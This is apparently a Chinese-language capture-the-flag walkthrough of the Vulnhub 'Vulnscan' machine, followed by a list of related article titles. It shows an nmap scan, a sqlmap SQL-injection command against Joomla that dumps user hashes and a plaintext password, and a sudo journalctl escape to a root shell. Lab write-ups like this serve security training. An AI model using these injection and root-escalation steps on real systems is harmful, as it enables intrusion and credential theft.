tragte IP: 192.168.139.136

信息收集

nmap -A 192.168.139.136

开放5个服务,分别为:

  • 22: ssh
  • 5000: wordpress
  • 80: http
  • 8081: joomla
  • 9001: Drupal

逐个分析漏洞

wordpress

发现存在一个命令执行:

http://fsociety.web:5000/admin-wp/

依据时间发现存在用户名和密码,可以直接登录,反弹shell一直失败

登录后可以得到:

journalctl不需要密码直接root执行,利用方式:https://gtfobins.github.io/gtfobins/journalctl/

使用方式:

sudo /bin/journalctl
!/bin/bash

joomla

发现存在sql注入,直接注入可得用户名和密码:

sqlmap -u "http://192.168.139.136:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users  --dump

username password email
joomlaCMS_admin $2y$10$EYc6SKfMLzlLE/IcD9a6XeAe2Uv7WTBFlbbqRrnpht1K0M1bLrWee Fluntence54@armyspy.com
elliot $2y$10$jddnEQpjriJX9jPxh6C/hOag4ZZXae4iVhL7GVRPC9SHWgqbi4SYy 5T3e!_M0un7i@N

可以看到elliot的邮箱就是密码,可以直接登录:

Drupal

版本为7.54,搜索exploit:

Vulnhub系列--Vulnscan相关推荐

  1. Vulnhub系列:Raven 1

    该篇为Vulnhub系列靶机渗透,本次靶机存在4个flag.下面开始我们今天的渗透之旅.Raven靶机有很多种思路,我将对其进行一一整理. 首先进行信息收集,利用arp-scan和nmap,进行靶机的 ...

  2. VulnHub系列之Lampiao渗透测试

    Lampiao 靶机下载:https://www.vulnhub.com/entry/lampiao-1,249/ 信息收集 首先是ip信息 然后是服务器端口服务等信息 访问80端口 扫描80端口网站 ...

  3. 【Vulnhub系列】DC1

    文章目录 基本信息 实验过程 额外内容 使用CVE2014-3704添加管理账号 另一种查询具有root权限命令的find语句 下载地址:https://www.vulnhub.com/entry/d ...

  4. Vulnhub系列:FristLeaks

    一.配置靶机环境 以往的靶机,本人是在virtual box中,去配置,和vm上的kali进行联动,但是这个靶机需要DHCP,以往的方式可能不太行了,或者可以在virtual box中桥接成统一网卡. ...

  5. VulnHub系列之Jarbas渗透测试

    jarbas 虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/ 信息收集 将下载好的服务器开机后登录不了,不知道ip ,只能将攻击机和服务器置于同一网段 ...

  6. 【Vulnhub系列】DC3

    文章目录 基本信息 实验过程 额外补充 利用php反弹shell 使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com ...

  7. 『VulnHub系列』Hacker Fest: 2019-Walkthrough

    靶机地址 难度:初级+1 靶机描述: The machine was part of my workshop for Hacker Fest 2019 at Prague. Difficulty le ...

  8. 『VulnHub系列』DC: 9-Walkthrough

    靶机地址 难度:中等 靶机发布日期:2019年12月29日 靶机描述:DC-9 is another purposely built vulnerable lab with the intent of ...

  9. 『VulnHub系列』EnuBox_Mattermost-Walkthrough

    靶机地址 难度:初级++ 靶机发布日期:2020年1月6日 靶机描述:Description: The Mattermost chatting system may or may not hold s ...

最新文章

  1. 【 MATLAB 】norm ( Vector and matrix norms )(向量范数以及矩阵范数)
  2. java对一个无序列表进行分组
  3. Python入门100题 | 第067题
  4. folders默认配置 shell_更改windows默认的User Shell Folders
  5. 程序员想要设计一门新的编程语言,学习什么语言好,用C/C++合适吗?
  6. mysql 5.7 升级 8.0_MySQL5.7升级到8.0过程详解
  7. linux lite 3.6 64bit,Linux Lite 3.6 正式发布:基于 Ubuntu 16.04.3 LTS 打造
  8. Tomcat项目get请求中参数乱码问题
  9. iGoogle背后的思考
  10. C++ 修改图片格式(后缀)
  11. 保温杯内壁有很多小泡泡
  12. 自制模仿谷歌搜索UI的网页
  13. 广西百强正菱集团涉非法吸存 当地银监局介入摸底银行贷款 柳州公安通告正菱集团涉非法集资
  14. minicom 下载
  15. Locating //etc/named.conf failed: 报错处理
  16. 点餐系统-C++实现
  17. RHCE认证资料2021.8.28
  18. IPad GoodReader阅读文档实现即点即译取词在线翻译
  19. 实用的php封装函数
  20. 动态mfc下调试无法进入mfc源代码的解决方法

热门文章

  1. python 抓包 scapy udp,python+scapy 抓包與解析
  2. 关于C#.NET中PerformanceCounter无法从系统备份存储中重建性能计数器设置,错误代码为 5的问题解决
  3. 小网站 php,王学集:phpwind与中小网站共同成长
  4. XAML形状转CSS
  5. wap精武堂源码php_Showgirl武装秀,“精武堂”大奖等你拿!
  6. Hbase shell命令 基本使用
  7. 【已解决】mongoose远程连接mongodb,当客户端断开网络重连时报错topology was destoryed...
  8. Win10开发之UWP控件的隐藏空间
  9. 我的达梦DCA培训小记
  10. python爬虫库的常见用法_$python爬虫系列(2)—— requests和BeautifulSoup库的基本用法...